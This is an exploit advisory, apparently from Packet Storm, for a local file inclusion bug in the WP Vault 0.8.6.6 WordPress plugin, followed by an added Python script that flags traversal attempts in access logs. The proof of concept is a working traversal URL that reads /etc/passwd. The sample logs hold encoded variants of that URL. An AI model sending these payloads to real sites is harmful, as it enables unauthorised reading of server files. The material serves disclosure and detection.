WordPress WP Vault 0.8.6.6 Local File Inclusion

2016-12-01T00:00:00
ID PACKETSTORM:139979
Type packetstorm
Reporter Lenon Leite
Modified 2016-12-01T00:00:00

Description

                                        
`# Exploit Title: WP Vault 0.8.6.6 - Plugin WordPress - Local File Inclusion  
# Date: 28/11/2016  
# Exploit Author: Lenon Leite  
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/  
# Software Link: https://wordpress.org/plugins/wp-vault/  
# Contact: http://twitter.com/lenonleite  
# Website: http://lenonleite.com.br/  
# Category: webapps  
# Version: 0.8.6.6  
# Tested on: Ubuntu 14.04  
  
1 - Description:  
  
$_GET['wpv-image'] is not escaped before it is used in an include statement.  
  
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/  
  
  
2 - Proof of Concept:  
  
http://Target/?wpv-image=[LFI]  
  
http://Target/?wpv-image=../../../../../../../../../../etc/passwd  
  
3 - Timeline:  
  
12/11/2016 - Discovered  
12/11/2016 - vendor not found  
  
`
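A detection sketch for the request pattern shown in the proof of concept, added here as an example and not part of the original advisory or the plugin's code. It scans web-server access logs for `wpv-image` values that contain directory traversal or an absolute path, and goes slightly beyond the advisory by also decoding repeated percent-encoding and backslash separators. The combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "wpv-image"  # query parameter named in the advisory
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A ".." path segment: at the start or after "/", followed by "/" or the end.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e), up to `rounds` passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(value):
    """True if the value could point an include outside the plugin directory."""
    v = decode_fully(value).replace("\\", "/")  # treat backslash as a separator
    return bool(TRAVERSAL_RE.search(v)) or v.startswith("/")

def flag_requests(log_lines):
    """Return (line_number, decoded_value) for each suspicious wpv-image request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl already percent-decodes once; decode_fully handles the rest.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == PARAM and is_suspicious(value):
                hits.append((n, decode_fully(value)))
    return hits

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2016:10:00:00 +0000] "GET /?wpv-image=../../../../etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.5 - - [01/Dec/2016:10:00:02 +0000] "GET /?wpv-image=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    '198.51.100.7 - - [01/Dec/2016:10:01:00 +0000] "GET /?wpv-image=photo-12.jpg HTTP/1.1" 200 48211',
    '198.51.100.7 - - [01/Dec/2016:10:01:05 +0000] "GET /?p=42 HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for line_no, value in flag_requests(SAMPLE_LOG):
        print(f"line {line_no}: {PARAM}={value!r}")
```

A hit only shows that a traversal-style request was made; the response status and size on the same log line help decide whether file contents were actually returned.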